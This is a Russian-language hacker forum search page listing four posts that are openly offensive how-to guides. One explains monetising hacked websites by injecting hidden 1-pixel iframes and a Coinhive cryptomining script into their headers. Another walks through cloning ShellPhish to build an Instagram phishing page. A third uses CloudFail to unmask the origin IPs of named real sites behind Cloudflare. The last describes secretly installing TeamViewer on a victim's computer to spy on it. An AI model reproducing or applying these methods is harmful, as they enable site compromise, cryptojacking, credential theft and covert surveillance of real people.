Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'форум'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • XAKERSAY
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 4 results

  1. Приветствую всех, зарабатывать можно на любом сайте, поверьте. Главное – получить админку, а она есть везде. Суть заработка заключается в том, что мы будем показывать пользователям взломанного сайта наш контент, за просмотры которого нам заплатят. Как внедрять свой код в сайт, я рассказывать не буду, так как это огромная тема, ведь существуют десятки движков + самописные движки + лендинги и сайты вовсе без движков. Но концепцию опишу... Первое, что нужно понять – это то, что наш контент должен быть на каждой странице сайта. Прелесть сайтов на движке заключается в том, что код head (шапка сайта) и footer (подвал сайта) пишется 1 раз и подгружается на все страницы. И чтобы загрузить наш контент на все страницы сайта, нам необходимо внедрить код в footer или head. Платный фотохостинг Сайт, который платит нам за просмотры картинок, которые мы загрузили к ним на хостинг. Но для этого нам нужно, чтоб человек перешел по ссылке и просмотрел сайт с картинкой. – это главный инструмент, которым мы будем пользоваться. Суть его работы в том, что мы на странице одного сайта показываем другой или кусок другого сайта. Самый простой пример – это Яндекс/Гугл карта в объявлении на том же Авито. Регистрируемся на платном фотохостинге, загружаем картинку, получаем ссылку. Заходим в админку взломанного сайта и ищем, как нам вставить свой код в шапку сайта. И вставляем следующий код: Разберем, что это такое: – это тег html. Что он делает, я уже рассказал; src="" – атрибут тега. В нашем случае – это ссылка на сайт, который нам надо показать пользователю; width="1px" – атрибут тега, ширина фрейма. Ставим 1 пиксель, чтоб его не было видно; height="1px" – атрибут тега, высота фрейма. Ставим 1 пиксель, чтоб не сдвигать уже существующие элементы сайта, иначе реальный админ будет искать причины того, что у него сайт "поехал", и найдет наш код. align="left" – атрибут тега. Прижимает фрейм к левому краю и разрешает другим элементам располагаться справа него. В результате этого пользователь просматривает нашу картинку, сам не замечая этого. Минусы – фотохостинги платят за целевой трафик, нам нужно будет несколько аккаунтов под несколько групп стран. Плюсы – беспалевность, пассив, простота реализации. Прибыльность – фотохостинги платят 100-230 рублей за 1000 просмотров. Теперь допустим, что у нас 10 сайтов с посещаемостью 100 человек в сутки. В результате у нас 1000 просмотров каждый день. Накрутка посетителей на нашем сайте Тут все просто, как дважды два. Создаем сайт, подключаем Яндекс/Гугл директ и делаем тоже самое. Только вместо ссылки от фотохостинга вставляем ссылку на страницу нашего сайта: Минусы – нужно вставлять ссылки на разные страницы сайта, нужно создавать сайт и возиться с директом. Плюсы – явных не наблюдается. Еще, как вариант, можно продавать посетителей другим владельцам сайтов, но тут тоже нужно нормально попотеть, и это уже не будет пассивным заработком. По поводу прибыльности ничего однозначного сказать не могу, так как реклама оценивается по-разному, в зависимости от тематики. Но за 1000 показов будет больше, чем платят фотохостинги. Майнер Относительно недавно сервис Coinhive подарил нам возможность майнить мощностями пользователя сайта. А кто сказал, что это должен быть пользователь нашего сайта? Регистрируемся на сайте Coinhive (ссылка выше), заходим в админку ломаного сайта и внедряем следующий скрипт: var miner = new CoinHive.Anonymous('YOUR_SITE_KEY'); miner.start(); Значение YOUR_SITE_KEY – берем в настройках на сайте, а сам скрипт подробно разбирается на сайте. Минусы – с недавних пор майнер не запускается автоматически (в начале загрузки сайта выскакивает баннер, в котором пользователь разрешает/отказывается майнить), майнер сильно грузит ПК пользователя, что может привести к проверке кода админом и последующему выявлению нашего скрипта (не учитывая баннера на весь экран). Плюсы – майнинг в тренде. Прибыльность – зависит от времени, на протяжении которого пользователь находится на сайте и мощности машины пользователя. Написанная информация в статье несет исключительно ознакомительный характер, чтобы дать возможность пользователю обезопасить себя. Автор не несет ответсвенности за использование данной информации личных корыстных целях.
  2. Всем привет, сейчас я вам хочу рассказать о том, как же можно очень быстро создать фишинговый сайт. Кто незнаком с этим понятием – то прошу ознакомиться, а если говорить проще, то это поддельный сайт. Итак, для работы на понадобится операционная система Kali Linux, после чего надо открыть ее консоль и ввести данную команду: git clone https://github.com/thelinuxchoice/shellphish Отлично, теперь здесь нам надо прописать данные команды: cd shellphish bash shellphish.sh Теперь из предложенных вариантов фишинговых сайтов мы должны выбрать нам необходимый. В качестве примера мною будет выбран фишинговый сайт для Инстаграм. Нам на выбор будет предоставлено несколько способов, я же выберу способ под номером 01, после чего нам нужно будет прописать порт, в случае его отсутствия – пропустить его ввод. Итак, мы видим данную ссылку, нам необходимо ее скопировать и вставить в адресную строку. Как вы видите, фейковая страничка была успешно создана, переходя по которой жертва введет свои данные для входа в аккаунт. После этого жертву перекидывает на официальный сайт инстаграм, если че пользователь уже был авторизован, то сразу же будет открыта его страничка в соц. сети. В то время как жертва отправляем нам свои данные, мы их получаем прямо в консоли, где мы может узнать IP, местонахождение и так далее. А вот после непосредственного нажатия кнопки входа мы получим данные вида: логин и пароль. Как вы видите это занимает кране много времени, но это не меняет того, что данный метод взлома страничек является очень эффективным.
  3. Cloudflare – это некая прокладка между посетителем и самим сайтом. Она работает в виде прокси, только в обратную сторону, тем самым давая некоторые возможности в виде кэширования страничек, защиту от ддос-атака, ботов и так далее. Также cloudflare маскирует настоящий ип-адрес сервера, на котором стоит сам сайт. Он использует собственные сервера имен, которые необходимы для отправки ответов на DNS-запросы и преобразование имя хоста в ип-адрес. Это значит, что создатель сайта использует для своего домена NS-сервера, они в ответ на DNS-запрос отсылают его в cloudflare, при этом получив страницу сервера, где находится сайт, после чего показывает данный сайт посетителю, которые сделал на это запрос. Это значит, что после этого настоящий ип-адрес неплохо скрывается. Если cloudflare будет правильно настроен, то истинный ип-адрес вычислить будет невозможно, ведь он никогда не раскрывается и никуда не записывается. Однако как мы знаем, людям свойственно ошибаться, это не стало исключением. Именно поэтому сегодня создают утилиты, которые пытаются найти уязвимости в опциях Cloudflare. Например, я могу рассказать о такой утилите, как CloudFail. Собственно именно об этой программе и пойдет речь в данной статье. Что такое CloudFail и как он работает Независимо от типа сайта он может иметь поддомен, как пример: site.org.ru. Количество таких доменов является неограниченным, а каждый такой домен может иметь собственный ип-адрес. Это значит что для site.org записывается один ип-адрес, для site.org.ru записывается уже другой ип-адрес и так по нарастающей. Бывают такие моменты, когда в DNS-записях первого домена написан адрес cloudflare, а это значит что DNS-записи для поддомена данного сайта ведут на другой ип-адрес, который не подключен к защите от cloudlfare. Это значит, что настоязий ип-адрес может быть раскрыт. Просто так мы не можем получить весь список субдоменов. А это значит все варианты нужно будет перебирать и пересматривать. Как раз таки это и реализуется в данной программе. Често говоря, выполнение данных процессов являетя 3-ей стадией. На 1 данная программа получает список все возможных субдоменов, после чего проводит их проверку. На 2 стадии этот инструмент обращается к CrimeFlrae, который имеет у себя в распоряжении огромную базу ип-адресов использующихся для сайтов и находящихся под защитой cloudflare. Если сайт знает какой-то из этих ип-адресов, то он сразу же будет показан. Теперь уже на 3 стадии будет выполнен брут субдоменов по словарю. После проделывания данных пунктов, найти ип-адрес, который не будет защищен cloudflare, становиться не проблемой. Как установить CloudFail Чтобы установит данную программу, вы должны иметь любую Unix-подобную операционную систему, после чего в ней ввести данную команду: sudo apt update sudo apt install python3-pip git tor git clone https://github.com/m0rtem/CloudFail cd CloudFail/ sudo pip3 install -r requirements.txt Чтобы проверить работоспособность программы прописываем: python3 cloudfail.py -h Также перед тем как запустит программу в первый раз, а также примерно каждый месяц, стоит проверять ее на наличие обновление, делается это с помощью данной команды: sudo python3 cloudfail.py –u После его скачивания будет произведено обновление всех ип-адресов cloudflare, а также БД для CrimeFlare. Если вы хотите использовать программу через луковую сеть, то вам будет нужно запустить службу Tor: sudo systemctl start tor Если же вы не собираетесь использовать данную сеть, то данный шаг можно смело пропускать. Строчка is part of the Cloudlflare network! Означает, что данный сайт находится под защитой cloudflare. Если бы защиты не было бы, то сканирование сразу же остановилось, ведь в случае отсутствия защиты, данный скан является абсолютно бессмысленным. Строчка Testing for misconfigured DNS using dnsdumpster… означает, что первый этап получения известных субдоменов начался. Как вы могли заметить, в данных результат среди DNS-записей мы можем заметить MX-записи, которые ведут нас на сервисы электронной почты. Посмотрите внимательнее, в данном случае эти записи ведут нас не на субдомены, а на хосты Гугла. Об этом также свидетельствуют ип-адреса. Данные хосты не находятся под защитой, однако для нахождения настоящего ип-адреса они не подходят. Единственное что мы можем вытянуть от сюда это то, что данный сайт использует электронную почту от Гугл. Строчка Scanning crimeflare databse… означает, что этап поиска сайтов в базе данных начался. Строчка Did not find anything означает, что в базе данных ничего не нашлось Строчка Scannig 2897 subdomains (subdomains.txt), please wait.. означает, что этап перебора всех возможных субдоменов по словарю был начат. Красная строка говорит нам о найденных субдоменах, однако их ип-адрес защищен, а это значит, что они нам не нужны. Зеленая же строка говорит о том, что найденные субдомены не находятся под защитой, а значит их можно использовать для обнаружения настоящего ип-адреса. Как пример из данных скринов я могу указать mail.anti-malware.ru, но к сожалению, данный ип-адрес опять принадлежит Гугл. Однако мы нашли то, что искали, это строка test.anti-malware.ru – ип-адрес VPS сервера. Следующее сканирование, сайт – searchengines.guru Вот результаты сканирования: Из них мы можем понять, что первый и третий этап не показали нам никаких результатов. Зато в базе данных мы сразу нашли настоящий ип-адрес. Теперь сканируем searchengines.ru В первом этапе мы можем увидеть только почтовые сервисы Google. В базе данных информации по сайту нет ничего. Зато на третьем этапе мы нашли много интересной информации: [09:19:32] [FOUND:SUBDOMAIN] cdn.searchengines.ru IP: 54.192.98.230 HTTP: 403 [09:20:51][FOUND:SUBDOMAIN] link.searchengines.ru IP: 90.156.201.86 HTTP: 200 [09:21:06] [FOUND:SUBDOMAIN] mail.searchengines.ru IP: 64.233.164.121 HTTP: 200 Mail.searchengines ведет на ип-адрес электронной почты Cdn.searchengines.ru – находится под защитой, значит он нам не подойдет Однако, link.searchengines.ru имеет ип-адрес сторонненго сервера. Открыв данну страницу мы увидим богом забытый онлайн-сервис. Это и может являться ип-адресом данного сайта. Однако в любом случае, данной субдомен связан с искомым сайтом. Ип-адрес сразу же был найден в базе данных, однако такой же ип имеют и субдомены, это может быть особенностью DNS. В этих случаях сервисы от Гугл не используется, однако используется другой сервис – protonmail. Данный домен имеет в себе неплохие MX-записи, как вы могли заметить. Данный ип-адрес может быть не только искомым ип-адресом сайта, но еще и быть источником полезных данных о провайдере, который предоставляет услуги интернета. А с помощью whois мы можем узнать его адрес и номер телефона. Также зеленый субдомен является очень интересным. Ведь в нем есть информации о ином возможном ип-адресе сайта. Однако не стоит сомневаться, данный ип-адрес также связан с создателем сайта.
  4. Приветствую вас уважаемые друзья и гости. Сегодня я хочу вам рассказать как получить доступ к чужому компьютеру, изменять и скачивать чужие файлы и так далее, в двух словах использовать компьютер так как вам угодно. Итак первым делом создаем себе почту, желательно на сервисе почтовой службы http://Google.com После этого как создали почту устанавливаем на ваш мобильный или компьютер программу, вот ссылка на официальный сайт разработчиков: https://www.teamviewer.com/ru/ также программу можно скачать на андроид в Google Play. После того как создали почту и установили приложение на свой компьютер вводим данные и выбираем будем ли мы управлять компьютером на котором приложение, или с него управлять другим устройством, внимательно следуем инструкции и всё получится не сомневайтесь, проверял лично! С устройства с которого будем управлять нужно также запустить приложение ввести айди (id) который нам выдадут при регистрации приложения и всё, доступ к компьютеру или устройству у вас в руках. Если не выйдет с первого раза, то повторите всё заново и внимательно читайте мастера по установке и настройке, приложение на компе запускается один раз, вводим данные и больше не придется постоянно его запускать даже если компьютер выключат и снова включат, смотрите настройки приложения после установки и как вам нравится так и настраивайте. Примечание, это приложение будет полезно для тех кто хочет узнать чем занимаются за компьютером в его отсутствие да и вообще в разных целях. На андроид дисплее откроется полноценный вид рабочего стола, и вы можете управлять компом как своим, менять, удалять, сохранять и многое другое. Внимание для управления устройством/компьютером нужна установка и ввод данных на обеих устройствах. Форум хакеров поясняет: Это приложение можно назвать инструментом хакера, но только в том случае если есть доступ к компьютеру жертвы, если же нет доступа, то хакеру придется найти способ установки приложения на комп жертвы удаленно, либо путем обмана. Ссылки на установку: 1. Windows: https://www.teamviewer.com/ru/ общая информация и установка приложения на комп. 2. Android: https://play.google.com/store/apps/details?id=com.teamviewer.teamviewer.market.mobile Просьба оставить отзывы у нас на форуме, те кто установил и испробовал программу. По вопросам установки или вопросов, обращайтесь в ЛС... С Уважением Администрация "xakersay.com"
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.